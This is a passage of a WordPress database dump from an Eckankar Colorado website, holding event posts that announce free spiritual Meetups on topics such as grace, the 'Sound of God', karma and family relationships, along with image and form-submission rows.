20:26:27','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265166',0,'mec-events','',0),(265167,2,'2021-06-24 14:15:34','2021-06-24 20:15:34','','dreaming-2','','inherit','closed','closed','','dreaming-2','','','2021-06-24 14:15:34','2021-06-24 20:15:34','',265166,'https://eckankar-colorado.org/wp-content/uploads/2021/06/dreaming-2.jpg',0,'attachment','image/jpeg',0),(265197,0,'2021-06-27 12:52:11','2021-06-27 18:52:11','','','','publish','closed','closed','','265197','','','2021-06-27 12:52:11','2021-06-27 18:52:11','',0,'https://eckankar-colorado.org/nf_sub/265197/',0,'nf_sub','',0),(265198,2,'2021-06-27 20:33:50','2021-06-28 02:33:50','<p><span style=\"font-size: 18pt;\"><strong>Spiritual Exercises - Connect with the life force.</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Advanced Spiritual Living Courses - This ever-expanding adventure can bring you personal transformation</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Join us for a spiritual discussion on \'Engage – Advanced Spiritual Living’. Be in the drivers seat of your own spiritual journey!</span><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">The discussion will be based on the following webpages:<br />\r\n</span></strong><span style=\"font-size: 14pt;\"><em>Daily Spiritual Inspiration: </em><a class=\"link\" title=\"https://www.eckankar.org/engage/daily-inspiration/\" href=\"https://www.eckankar.org/engage/daily-inspiration/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Quote of the Day</a><br />\r\n</span><span style=\"font-size: 14pt;\"><em>Develop a daily practice:</em> <a class=\"link\" title=\"https://www.eckankar.org/engage/develop-a-daily-practice/\" href=\"https://www.eckankar.org/engage/develop-a-daily-practice/\" target=\"_blank\" rel=\"nofollow noopener ugc\">The Spiritual Exercises of ECK</a><br />\r\n</span><span style=\"font-size: 14pt;\"><em>Advanced Spiritual Living Courses:</em> <a class=\"link\" title=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What will you experience?</a></span></p>\r\n<p><span style=\"font-size: 14pt;\">We welcome you to explore these pages before the Meetup, and look forward to exchanging insights and experiences!</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The Zoom meeting link will be provided to those who RSVP that they are attending.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This \'<strong>Engage – Advanced Spiritual Living’ </strong>Meetup is the sixth of six topics in the \'A JOURNEY LIKE NO OTHER’ series, sponsored by Eckankar - The Path of Spiritual Freedom – in Colorado.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">If you have not attended previous sessions in the series, want to know what the other sessions contained, or for an overview orientation of the entire series click here:  <a href=\"https://www.meetup.com/SEGofAurora/events/277003273/\">‘A JOURNEY LIKE NO OTHER’ Series - Overview</a></span></p>\r\n<p><span style=\"font-size: 14pt;\">We invite you, and welcome you, to attend any one, or any combination, of the Meetups in the ‘A JOURNEY LIKE NO OTHER’ series.</span></p>\r\n<p><span style=\"font-size: 14pt;\">For spiritual keys that can help you create a more rich and fulfilling life, </span><span style=\"font-size: 14pt;\">go to \'Online ECKANKAR Soul Adventure—Spiritual Keys for a Happier Life\'. This online seminar is available through June 30th. </span><span style=\"font-size: 14pt;\"><a href=\"https://www.eckankar.org/soul-adventure/\">Spiritual Keys for a Happier Life</a><br />\r\n</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/275451327/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT<br>\'Engage – Advanced Spiritual Living’<br> ‘A JOURNEY LIKE NO OTHER’ Series','','publish','closed','closed','','meetup-online-eventtemplate-697','','','2021-06-27 20:44:44','2021-06-28 02:44:44','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265198',0,'mec-events','',0),(265199,2,'2021-06-27 20:33:09','2021-06-28 02:33:09','','hand-reaching-1','','inherit','closed','closed','','hand-reaching-1','','','2021-06-27 20:33:09','2021-06-28 02:33:09','',265198,'https://eckankar-colorado.org/wp-content/uploads/2021/06/hand-reaching-1.jpg',0,'attachment','image/jpeg',0),(265201,0,'2021-06-28 09:20:32','2021-06-28 15:20:32','','','','publish','closed','closed','','265201','','','2021-06-28 09:20:32','2021-06-28 15:20:32','',0,'https://eckankar-colorado.org/nf_sub/265201/',0,'nf_sub','',0),(265202,0,'2021-06-28 17:55:15','2021-06-28 23:55:15','','','','publish','closed','closed','','265202','','','2021-06-28 17:55:15','2021-06-28 23:55:15','',0,'https://eckankar-colorado.org/nf_sub/265202/',0,'nf_sub','',0),(265203,0,'2021-06-30 14:09:17','2021-06-30 20:09:17','','','','publish','closed','closed','','265203','','','2021-06-30 14:09:17','2021-06-30 20:09:17','',0,'https://eckankar-colorado.org/nf_sub/265203/',0,'nf_sub','',0),(265208,0,'2021-07-02 08:44:08','2021-07-02 14:44:08','','','','publish','closed','closed','','265208','','','2021-07-02 08:44:08','2021-07-02 14:44:08','',0,'https://eckankar-colorado.org/nf_sub/265208/',0,'nf_sub','',0),(265209,0,'2021-07-02 08:45:49','2021-07-02 14:45:49','','','','publish','closed','closed','','265209','','','2021-07-02 08:45:49','2021-07-02 14:45:49','',0,'https://eckankar-colorado.org/nf_sub/265209/',0,'nf_sub','',0),(265210,0,'2021-07-02 09:08:41','2021-07-02 15:08:41','','','','publish','closed','closed','','265210','','','2021-07-02 09:08:41','2021-07-02 15:08:41','',0,'https://eckankar-colorado.org/nf_sub/265210/',0,'nf_sub','',0),(265213,0,'2021-07-04 13:35:37','2021-07-04 19:35:37','','','','publish','closed','closed','','265213','','','2021-07-04 13:35:37','2021-07-04 19:35:37','',0,'https://eckankar-colorado.org/nf_sub/265213/',0,'nf_sub','',0),(265214,2,'2021-07-04 13:57:29','2021-07-04 19:57:29','<p><strong><span style=\"font-size: 14pt;\">Do you want to meet the challenges of life with more grace?</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">Do you see yourself as immersed in the flow of life’s love and blessings?</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">Can you recognize the hand of God in your life and gratefully accept what comes your way?</span></strong><br />\r\n<br />\r\n</p>\r\n<p>&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666;\">“The best approach to spiritual unfoldment is to expect the greatest love and blessings from the divine ECK (Spirit), but then accept whatever comes your way. Expect, but accept.”</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em> The Spiritual Laws of Life, p.28</em></span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">The purpose of this Meetup is to help us to meet the challenges of life gracefully and to recognize how the grace of God manifests in our lives. We will discuss graceful living and practice a couple spiritual techniques to help you tune into the Divine and all the love and blessings that are yours even through difficult times.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">TheSoundofSoul.org</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">For a free Spiritual Experiences guidebook and CD on past lives, dreams, Soul Travel, and more; go to <a class=\"link\" title=\"www.SpiritualExperience.org\" href=\"http://www.SpiritualExperience.org\" target=\"_blank\" rel=\"nofollow noopener ugc\">SpiritualExperience.org</a>.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/275451327/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT<br>12 Secrets of Spiritual Living: The Power of Grace','','publish','closed','closed','','meetup-online-eventtemplate-905','','','2021-07-04 14:00:10','2021-07-04 20:00:10','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265214',0,'mec-events','',0),(265215,2,'2021-07-04 13:57:09','2021-07-04 19:57:09','','sunset-horizon-1','','inherit','closed','closed','','sunset-horizon-1','','','2021-07-04 13:57:09','2021-07-04 19:57:09','',265214,'https://eckankar-colorado.org/wp-content/uploads/2021/07/sunset-horizon-1.jpg',0,'attachment','image/jpeg',0),(265216,0,'2021-07-05 13:54:22','2021-07-05 19:54:22','','','','publish','closed','closed','','265216','','','2021-07-05 13:54:22','2021-07-05 19:54:22','',0,'https://eckankar-colorado.org/nf_sub/265216/',0,'nf_sub','',0),(265217,2,'2021-07-05 20:56:33','2021-07-06 02:56:33','<p><span style=\"font-size: 16pt;\"><strong>Do you know that the Divine speaks to us through Sound?<br />\r\n</strong><strong>Have you heard the God sound in your everyday life? Is it always there?</strong></span><br />\r\n<span style=\"font-size: 16pt;\"><strong>Do you know how to tune into the God Sound and the wisdom and love that it brings?</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Harold Klemp says:<br />\r\n“<em>It is the sound of all sounds. It is the wind in the leaves, falling rain, thunder of jets, singing of birds, the awful rumble of a tornado. Again Its sound is heard in laughter, weeping, the din of city traffic, ocean waves, and the quiet rippling of a mountain stream.</em>”</span></p>\r\n<p><span style=\"font-size: 14pt;\">Come experience the Sound of God for yourself at this Meetup. It is our goal that each of you will have a direct experience with the God sound.</span><br />\r\n<span style=\"font-size: 14pt;\">We will offer multiple exercises to practice hearing the Sound of God. Each exercise will begin with an inspirational quote, followed by a brief discussion after the exercise is completed.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You may wish to bring a journal or paper to record your experiences and insights. Take this opportunity to tune into the God Sound in a whole new way!</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">TheSoundofSoul.org</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/279287938/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT<br>Travel Tips on the Road to Spiritual Freedom','','publish','closed','closed','','meetup-online-eventtemplate-123','','','2021-07-05 20:58:35','2021-07-06 02:58:35','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265217',0,'mec-events','',0),(265220,2,'2021-07-05 21:04:30','2021-07-06 03:04:30','<p><span style=\"font-size: 14pt;\">Would you like to create a home that is a sacred place where you and your family support each other spiritually in your journeys through life? If so, please join us. All are welcome.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Harold Klemp in his book The Spiritual Life says “<em>Harmony in a family is a sacred thing</em>.” When we create a spiritual home for our family, it brings more harmony and divine love into every moment of life.</span><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">In this session we will discuss:</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">- Ways to grow love in your home including a spiritual exercise you can do with your family</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">- Practicing gratitude and forgiveness</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">- How to support each other spiritually</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You can explore parents and families resources at <a class=\"link\" title=\"www.eckankar.org/explore/parents-families.\" href=\"http://www.eckankar.org/explore/parents-families.\" target=\"_blank\" rel=\"nofollow noopener ugc\">Parents &amp; Families</a></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/279275350/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT<br>Creating a Spiritual Home for Your Family','','publish','closed','closed','','meetup-online-eventtemplate-408','','','2021-07-05 21:06:06','2021-07-06 03:06:06','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265220',0,'mec-events','',0),(265221,2,'2021-07-05 21:03:23','2021-07-06 03:03:23','','people-2','','inherit','closed','closed','','people-2','','','2021-07-05 21:03:23','2021-07-06 03:03:23','',265220,'https://eckankar-colorado.org/wp-content/uploads/2021/07/people-2.jpg',0,'attachment','image/jpeg',0),(265222,0,'2021-07-07 21:52:19','2021-07-08 03:52:19','','','','publish','closed','closed','','265222','','','2021-07-07 21:52:19','2021-07-08 03:52:19','',0,'https://eckankar-colorado.org/nf_sub/265222/',0,'nf_sub','',0),(265223,0,'2021-07-07 21:58:56','2021-07-08 03:58:56','','','','publish','closed','closed','','265223','','','2021-07-07 21:58:56','2021-07-08 03:58:56','',0,'https://eckankar-colorado.org/nf_sub/265223/',0,'nf_sub','',0),(265224,0,'2021-07-08 20:58:56','2021-07-09 02:58:56','','','','publish','closed','closed','','265224','','','2021-07-08 20:58:56','2021-07-09 02:58:56','',0,'https://eckankar-colorado.org/nf_sub/265224/',0,'nf_sub','',0),(265225,0,'2021-07-08 22:19:31','2021-07-09 04:19:31','','','','publish','closed','closed','','265225','','','2021-07-08 22:19:31','2021-07-09 04:19:31','',0,'https://eckankar-colorado.org/nf_sub/265225/',0,'nf_sub','',0),(265226,0,'2021-07-10 10:07:57','2021-07-10 16:07:57','','','','publish','closed','closed','','265226','','','2021-07-10 10:07:57','2021-07-10 16:07:57','',0,'https://eckankar-colorado.org/nf_sub/265226/',0,'nf_sub','',0),(265229,0,'2021-07-12 17:18:36','2021-07-12 23:18:36','','','','publish','closed','closed','','265229','','','2021-07-12 17:18:36','2021-07-12 23:18:36','',0,'https://eckankar-colorado.org/nf_sub/265229/',0,'nf_sub','',0),(265230,0,'2021-07-17 01:43:30','2021-07-17 07:43:30','','','','publish','closed','closed','','265230','','','2021-07-17 01:43:30','2021-07-17 07:43:30','',0,'https://eckankar-colorado.org/nf_sub/265230/',0,'nf_sub','',0),(265234,0,'2021-07-17 22:36:33','2021-07-18 04:36:33','','','','publish','closed','closed','','265234','','','2021-07-17 22:36:33','2021-07-18 04:36:33','',0,'https://eckankar-colorado.org/nf_sub/265234/',0,'nf_sub','',0),(265235,0,'2021-07-18 13:51:42','2021-07-18 19:51:42','','','','publish','closed','closed','','265235','','','2021-07-18 13:51:42','2021-07-18 19:51:42','',0,'https://eckankar-colorado.org/nf_sub/265235/',0,'nf_sub','',0),(265237,2,'2021-07-22 20:42:02','2021-07-23 02:42:02','','sun-on-water-1','','inherit','closed','closed','','sun-on-water-1','','','2021-07-22 20:42:02','2021-07-23 02:42:02','',264608,'https://eckankar-colorado.org/wp-content/uploads/2021/04/sun-on-water-1.jpg',0,'attachment','image/jpeg',0),(265239,0,'2021-07-22 22:09:32','2021-07-23 04:09:32','','','','publish','closed','closed','','265239','','','2021-07-22 22:09:32','2021-07-23 04:09:32','',0,'https://eckankar-colorado.org/nf_sub/265239/',0,'nf_sub','',0),(268833,0,'2023-07-28 11:06:47','2023-07-28 17:06:47','','','','publish','closed','closed','','268833','','','2023-07-28 11:06:47','2023-07-28 17:06:47','',0,'https://eckankar-colorado.org/nf_sub/268833/',0,'nf_sub','',0),(268835,15,'2023-07-28 15:22:05','2023-07-28 21:22:05','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">How to Live Free from Karma and Rebirth.</span></strong></span></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will have a discussion on the booklet <em>Karma and Reincarnation, How to Live Free from Karma and Rebirth</em>, by Harold Klemp, the leader of ECKANKAR. Booklets are free to newcomers. This will be held at the Manitou Springs Library, 515 Manitou Ave. (new location) at 1:00 pm. This discussion will be held for 3 weeks in a row, Aug. 9, 16, &amp; 23 at the same time and location. Everyone is welcome to come and share your viewpoints and insights on this spiritual topic.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofcs/events/lbrxftyfclbmb/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Karma and Reincarnation','','publish','closed','closed','','karma-and-reincarnation','','','2023-08-04 11:25:05','2023-08-04 17:25:05','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268835',0,'mec-events','',0),(265241,2,'2021-07-23 12:39:51','2021-07-23 18:39:51','<p>&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“The mind can overreact to the rush of everyday living, leaving us on edge and out of sorts. We forget that help is as near as a few moments in contemplation.\"</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em>The Sound of Soul </em>p. 60</span></p>\r\n</blockquote>\r\n<p><br />\r\n<span style=\"font-size: 14pt;\">At certain times in your life, things are more up in the air than at other times. When they are, you’re living on the edge. Your nerves are frayed, or sometimes you’re being pushed too fast for what you can do. If you don’t get it done, you wonder, then what? Because you don’t know.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">These are the tensions of living.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This is what the world is for. It’s a place filled with such tensions. Why? Because it’s the nature of karma. This is a schoolroom. It\'s a garden where everyone can grow spiritually.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Come and discover techniques and inspiration to survive and thrive!</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is also an e-booklet available online, Spiritual Stress Relief, in the ebooklet section of the Eckankar website: </span><span style=\"font-size: 14pt;\"><a class=\"link\" title=\"https://www.eckankar.org/ebooklets/\" href=\"https://www.eckankar.org/ebooklets/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECK Soul Adventure eBooklets</a></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Everyone is invited to attend! This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofBV/events/279602842/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT<br>Spiritual Stress Relief','','publish','closed','closed','','631-990','','','2021-07-24 15:34:11','2021-07-24 21:34:11','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265241',0,'mec-events','',0),(265242,2,'2021-07-23 12:33:42','2021-07-23 18:33:42','','contemplation-water-color-1','','inherit','closed','closed','','contemplation-water-color-1','','','2021-07-23 12:33:42','2021-07-23 18:33:42','',265241,'https://eckankar-colorado.org/wp-content/uploads/2021/07/contemplation-water-color-1.jpg',0,'attachment','image/jpeg',0),(265243,0,'2021-07-25 18:13:58','2021-07-26 00:13:58','','','','publish','closed','closed','','265243','','','2021-07-25 18:13:58','2021-07-26 00:13:58','',0,'https://eckankar-colorado.org/nf_sub/265243/',0,'nf_sub','',0),(265244,2,'2021-07-27 18:13:14','2021-07-28 00:13:14','<p><strong><span style=\"font-size: 14pt;\">You are Soul - an eternal, unique, divine spark of God.<br />\r\n<br />\r\n</span></strong><strong><span style=\"font-size: 14pt;\">Let your own unique talents and interests create a pathway of discovery that leads to your highest destiny as Soul!</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Explore new ways to think about life, your pursuit of happiness, and your quest to realize your highest potential. </span><span style=\"font-size: 14pt;\">Take a Journey of Self-Discovery!</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The ‘Finding Your Life’s Purpose’ SEGAMeetup discussion offers inspiration, stories, tips, and spiritual exercises for finding and exploring your ‘Life’s Purpose’.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>References:</strong></span><br />\r\n<span style=\"font-size: 14pt;\">We welcome you to explore these pages before the Meetup, and look forward to exchanging insights and experiences</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>View or Download the Free eBooklet (also in French). </strong>ECK SOUL ADVENTURE EBOOKLET </span><br />\r\n<span style=\"font-size: 14pt;\"><a class=\"link\" title=\"https://www.eckankar.org/wp-content/uploads/2021/02/Finding_Your_Lifes_Purpose.pdf\" href=\"https://www.eckankar.org/wp-content/uploads/2021/02/Finding_Your_Lifes_Purpose.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Finding Your Life’s Purpose - English</a></span><br />\r\n<span style=\"font-size: 14pt;\"><a class=\"link\" title=\"https://www.eckankar.org/wp-content/uploads/2021/02/FR_Finding_Your_Lifes_Purpose.pdf\" href=\"https://www.eckankar.org/wp-content/uploads/2021/02/FR_Finding_Your_Lifes_Purpose.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Finding Your Life’s Purpose - French</a></span></p>\r\n<p><br />\r\n<span style=\"font-size: 14pt;\">Find stories, inspiration, techniques and more in this ECK Soul Adventure eBooklet. Go higher, further, deeper on your path of spiritual self-discovery!</span><br />\r\n<span style=\"font-size: 14pt;\"><a class=\"link\" title=\"https://www.eckankar.org/experience/find-your-lifes-purpose/\" href=\"https://www.eckankar.org/experience/find-your-lifes-purpose/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Spiritual Adventure Begins Here - Finding Your Life’s Purpose</a></span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofAurora/events/279692077/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>Finding Your Life’s Purpose','','publish','closed','closed','','631-862','','','2021-07-27 18:15:14','2021-07-28 00:15:14','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265244',0,'mec-events','',0),(265245,2,'2021-07-27 18:12:22','2021-07-28 00:12:22','','girl-eagle-1','','inherit','closed','closed','','girl-eagle-1','','','2021-07-27 18:12:22','2021-07-28 00:12:22','',265244,'https://eckankar-colorado.org/wp-content/uploads/2021/07/girl-eagle-1.jpg',0,'attachment','image/jpeg',0),(265247,2,'2021-07-27 18:20:39','2021-07-28 00:20:39','<p><strong><span style=\"font-size: 14pt;\">Do you feel free to be yourself and do you love yourself unconditionally?</span></strong><br />\r\n<br />\r\n<strong><span style=\"font-size: 14pt;\">How would your relationships change if you practiced unconditional love with your family and friends?</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">During this Meetup, we will explore these questions and more.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Harold Klemp says in <em>The Sound of Soul</em>, “By giving love, we become magnets of love. The happiest people are those who give and receive love from their families and friends. Now, we’re talking about the “no-strings-attached” kind of love.”</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The purpose of this Meetup is to help you to be free to be yourself and give others the same freedom. We will discuss unconditional love and practice a couple spiritual techniques to help you tune into the Divine and all the love and blessings that are yours.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"nofollow noopener ugc\">TheSoundofSoul.org</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">For a free Spiritual Experiences guidebook and CD on past lives, dreams, Soul Travel, and more; go to <a class=\"link\" title=\"www.SpiritualExperience.org\" href=\"http://www.SpiritualExperience.org\" target=\"_blank\" rel=\"nofollow noopener ugc\">SpiritualExperience.org</a>.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/279693717/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>12 Secrets of Spiritual Living: Loving as God Loves','','publish','closed','closed','','631-188','','','2021-07-27 18:20:39','2021-07-28 00:20:39','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265247',0,'mec-events','',0),(265248,2,'2021-07-27 18:19:35','2021-07-28 00:19:35','','green-trees-1','','inherit','closed','closed','','green-trees-1','','','2021-07-27 18:19:35','2021-07-28 00:19:35','',265247,'https://eckankar-colorado.org/wp-content/uploads/2021/07/green-trees-1.jpg',0,'attachment','image/jpeg',0),(265249,2,'2021-07-27 18:25:17','2021-07-28 00:25:17','<p><strong><span style=\"font-size: 14pt;\">One of the ways we learn about love is through our relationships with our family. And sometimes finding love and harmony with family members is our greatest challenge.</span></strong></p>\r\n<p><strong><span style=\"font-size: 14pt;\">Would you like to find greater happiness in all of your relationships? If so you are invited to join us.</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Some of the topics we will explore are:</span></p>\r\n<p><span style=\"font-size: 14pt;\">· Loving yourself first, then loving others</span><br />\r\n<span style=\"font-size: 14pt;\">· How do karma and past lives affect our relationships?</span><br />\r\n<span style=\"font-size: 14pt;\">· Keys to gratitude and forgiveness</span></p>\r\n<p><span style=\"font-size: 14pt;\">We’ll also share a couple of spiritual exercises you can use to live a happier, more fulfilling life.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Harold Klemp says in his book ECK Wisdom on Relationships says, “If you love someone or something, nurture it. That means, at least once during the day, give the object of your attention or the person of your heart your full love. Even if just for a little while, listen to what they are saying. During this time, you are putting the little self aside.”</span></p>\r\n<p><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/279693854/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>The Spiritual Gift of Family Relationships','','publish','closed','closed','','631-565','','','2021-07-27 18:25:17','2021-07-28 00:25:17','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265249',0,'mec-events','',0),(265250,2,'2021-07-27 18:24:07','2021-07-28 00:24:07','','child-laughing-1','','inherit','closed','closed','','child-laughing-1','','','2021-07-27 18:24:07','2021-07-28 00:24:07','',265249,'https://eckankar-colorado.org/wp-content/uploads/2021/07/child-laughing-1.jpg',0,'attachment','image/jpeg',0),(265263,0,'2021-08-05 13:24:44','2021-08-05 19:24:44','','','','publish','closed','closed','','265263','','','2021-08-05 13:24:44','2021-08-05 19:24:44','',0,'https://eckankar-colorado.org/nf_sub/265263/',0,'nf_sub','',0),(265264,0,'2021-08-05 14:51:24','2021-08-05 20:51:24','','','','publish','closed','closed','','265264','','','2021-08-05 14:51:24','2021-08-05 20:51:24','',0,'https://eckankar-colorado.org/nf_sub/265264/',0,'nf_sub','',0),(265265,0,'2021-08-06 12:16:49','2021-08-06 18:16:49','','','','publish','closed','closed','','265265','','','2021-08-06 12:16:49','2021-08-06 18:16:49','',0,'https://eckankar-colorado.org/nf_sub/265265/',0,'nf_sub','',0),(265267,2,'2021-08-09 08:44:28','2021-08-09 14:44:28','<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 16pt;\">-Have you ever felt spirit was guiding you?</span></strong></span><br />\r\n<br />\r\n<span style=\"color: #666666;\"><strong><span style=\"font-size: 16pt;\">-Do you want to be more focused on the uplifting presence of the 